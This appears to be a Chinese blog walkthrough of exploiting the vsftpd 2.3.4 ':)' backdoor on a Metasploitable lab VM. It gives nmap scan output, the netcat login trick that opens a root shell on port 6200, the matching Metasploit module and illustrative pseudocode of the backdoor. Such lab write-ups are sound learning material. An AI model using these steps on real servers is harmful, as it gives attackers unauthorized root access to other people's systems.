首页 > 其他分享 >笑脸漏洞

笑脸漏洞

时间:2024-10-25 13:09:11浏览次数:1  
标签:Nmap nmap 笑脸 192.168 漏洞 tcp kali open

目前网络:mp和kali都是NAT模式,连的是手机热点

在ifconfig得知本机ip为192.168.75.133,用nmap扫描网段

nmap 192.168.75.0/24
nmap 网关ip/24

┌──(root㉿kali)-[/home/kali]
└─# nmap 192.168.75.0/24                                                                                
Starting Nmap 7.94 ( https://nmap.org ) at 2024-10-25 11:09 CST
Nmap scan report for 192.168.75.1
Host is up (0.00036s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
2869/tcp open  icslap
6881/tcp open  bittorrent-tracker
MAC Address: 00:50:56:C0:00:08 (VMware)

Nmap scan report for 192.168.75.2
Host is up (0.00022s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
53/tcp open  domain
MAC Address: 00:50:56:EE:63:B9 (VMware)

Nmap scan report for 192.168.75.132
Host is up (0.0019s latency).
Not shown: 977 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
1099/tcp open  rmiregistry
1524/tcp open  ingreslock
2049/tcp open  nfs
2121/tcp open  ccproxy-ftp
3306/tcp open  mysql
5432/tcp open  postgresql
5900/tcp open  vnc
6000/tcp open  X11
6667/tcp open  irc
8009/tcp open  ajp13
8180/tcp open  unknown
MAC Address: 00:0C:29:8F:5D:C1 (VMware)

Nmap scan report for 192.168.75.254
Host is up (0.0011s latency).
All 1000 scanned ports on 192.168.75.254 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:50:56:FA:97:6D (VMware)

Nmap scan report for 192.168.75.133
Host is up (0.0000040s latency).
All 1000 scanned ports on 192.168.75.133 are in ignored states.
Not shown: 1000 closed tcp ports (reset)

Nmap done: 256 IP addresses (5 hosts up) scanned in 8.10 seconds

可以看出来mp的ip应该是192.168.75.132

看下每个端口的服务是什么

nmap -sV 靶机ip

┌──(root㉿kali)-[/home/kali]
└─# nmap -sV 192.168.75.132                                                                             
Starting Nmap 7.94 ( https://nmap.org ) at 2024-10-25 11:12 CST
Nmap scan report for 192.168.75.132
Host is up (0.0025s latency).
Not shown: 977 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login       OpenBSD or Solaris rlogind
514/tcp  open  tcpwrapped
1099/tcp open  java-rmi    GNU Classpath grmiregistry
1524/tcp open  bindshell   Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         UnrealIRCd
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:8F:5D:C1 (VMware)
Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.45 seconds     

利用netcat与21端口建立连接
nc 靶机ip 目标端口

┌──(root㉿kali)-[/home/kali]
└─# nc 192.168.75.132 21

220 (vsFTPd 2.3.4)

220状态码表示服务已准备好

接下里输入(用户名字里得带英文键的:)用作结尾,这里以a:)为例)
use a:)
提示331码(表示需要密码)后
然后输入(随便输入,这里以123为例)
pass 123
在显示421 Timeout前

打开另一个命令行
用nmap扫描靶机的6200端口

nmap -p 目标端口 靶机ip

┌──(root㉿kali)-[/home/kali]
└─# nmap -p 6200 192.168.75.132        
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-25 11:34 CST
Nmap scan report for 192.168.75.132
Host is up (0.00048s latency).

PORT     STATE SERVICE
6200/tcp open  lm-x
MAC Address: 00:0C:29:8F:5D:C1 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds 

可以看到是开着的

现在用netcat连下6200端口
nc 靶机ip 目标端口

┌──(root㉿kali)-[/home/kali]
└─# nc 192.168.75.132 6200     
whoami
root
^C

连接后输入whoami
显示root
说明此时有了管理员权限了

在mp上查看该漏洞

输入msfconsole打开mp
输入search vsftpd 2.3.4
pAwthmd.png
输入
use exploit/unix/ftp/vsftpd_234_backdoor
info
pAwt5TI.png
pAwtTtP.png

脚本:

/* vsftpd login handling pseudocode demonstration */

int handle_user_login(const char* username) {
    char user_buf[512];
    strncpy(user_buf, username, sizeof(user_buf) - 1);
    user_buf[sizeof(user_buf) - 1] = '\0';
    
    /* 检查用户名中是否包含:) */
    if (strlen(user_buf) > 6) {
        char* ptr = strstr(user_buf, ":)");
        if (ptr != NULL) {
            /* 触发后门逻辑 */
            if (fork() == 0) {
                /* 子进程 */
                int sockfd = create_socket();
                bind_port(sockfd, 6200);
                listen_and_handle(sockfd);
                exit(0);
            }
            return -1;  // 返回登录失败
        }
    }
    
    return validate_normal_login(user_buf);
}

void process_login_request(int client_fd) {
    char username[512];
    receive_username(client_fd, username);
    
    int login_result = handle_user_login(username);
    if (login_result < 0) {
        send_login_failed(client_fd);
    }
}
  • 在用户名中包含:)字符串
  • 会触发一个特殊的代码路径
  • 会在端口6200上打开一个后门监听
  • 这个后门会以root权限运行
  • 允许未经授权的命令执行

标签:Nmap,nmap,笑脸,192.168,漏洞,tcp,kali,open
From: https://www.cnblogs.com/liufengwuya/p/18502298

相关文章

  • dedecms有什么漏洞
    DedeCMS存在的主要漏洞包括:1、SQL注入漏洞;2、跨站脚本攻击(XSS);3、文件包含漏洞;4、信息泄露;5、权限绕过。SQL注入漏洞可以让攻击者执行恶意SQL代码,获取敏感数据。跨站脚本攻击能插入恶意脚本到网页中,影响用户的数据和安全。文件包含漏洞可能让攻击者加载外部文件,执行恶意代码。......
  • 域内漏洞和利用
    实验目的与要求实验目的通过实验能够进行漏洞提权、复现、检测及防御。实验要求(1)认识近年来域内爆发的高危漏洞;(2)能够描述高危漏洞的背景、漏洞影响版本、漏洞原理;(3)能够利用漏洞提权,进行漏洞复现、检测及防御。实验原理与内容实验原理(1)简述提权及其分类提权(Pr......
  • 【漏洞复现】灵当CRM getOrderList Sql注入漏洞
    免责声明:        本文旨在提供有关特定漏洞的信息,以帮助用户了解潜在风险。发布此信息旨在促进网络安全意识和技术进步,并非出于恶意。读者应理解,利用本文提到的漏洞或进行相关测试可能违反法律或服务协议。未经授权访问系统、网络或应用程序可能导致法律责任或严......
  • 【漏洞复现】华望云 会议管理平台 confmanger.inc 后台SQL注入漏洞
    免责声明:        本文旨在提供有关特定漏洞的信息,以帮助用户了解潜在风险。发布此信息旨在促进网络安全意识和技术进步,并非出于恶意。读者应理解,利用本文提到的漏洞或进行相关测试可能违反法律或服务协议。未经授权访问系统、网络或应用程序可能导致法律责任或严......
  • 漏洞复现Jupyter Notebook未授权访问 getshell
    一、JupyterNotebook介绍JupyterNotebook(此前被称为IPythonnotebook)是基于网页的用于交互计算的应用程序,是一个交互式笔记本,支持运行40多种编程语言。JupyterNotebook是以网页的形式打开,可以在网页页面中直接编写代码和运行代码,代码的运行结果也会直接在代码块下显示......
  • 从梦想到现实:十年见证AI自动化漏洞修复的演变
    #1024程序员节|征文#2014年的梦想与构想回到2014年,那时的我还在不断学习、探索和思考,如何利用科技力量去创造一个更加安全和高效的数字世界。作为一名初出茅庐的技术爱好者,我深知互联网的发展离不开安全防护,而网站漏洞修复是其中至关重要的一环。于是,我萌生了一个大胆的想法......
  • CVE-2021-27905(Apache Solr SSRF)漏洞复现
    CVE-2021-27905(ApacheSolrSSRF)ApacheSolr是一个开源的搜索服务,使用Java编写、运行在Servlet容器的一个独立的全文搜索服务器,是ApacheLucene项目的开源企业搜索平台。该漏洞是由于没有对输入的内容进行校验,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行SSRF攻击,......
  • CVE-2014-4210Weblogic SSRF漏洞复现
    weblogic中存在SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。影响版本:weblogic10.0.2-10.3.6版本一、漏洞复现第一步:进入漏洞环境并启动环境#启动cdvulhub/weblogic/ssrfdocker-composebuilddocker-composeup-d#访问http://......
  • Bluecms 1.6 代码审计过程(共计 74 个漏洞)
    目录前言安装步骤网站结构入口文件审计1.include/common.fun.phpuser_name参数存在CookieSql注入漏洞2.templates/default/user.htm存在CookieselfXss反射型漏洞正式审计过程3.ad_js.php文件ad_id参数存在SQL注入漏洞4.ad_js.php文件ad_id参数存在......
  • 融云IM干货丨 私有云安全审计中,哪些是最常见的安全漏洞?
    在私有云安全审计中,以下是一些最常见的安全漏洞:云配置错误:这可能是组织面临的最常见的漏洞,包括身份和访问管理(IAM)的不安全配置、公共数据存储的不当设置、其他错误配置,如未使用HTTPS、开放的端口、不安全的API等。缺乏可见性:随着云服务使用量的增加,基础设施的规模也随之增......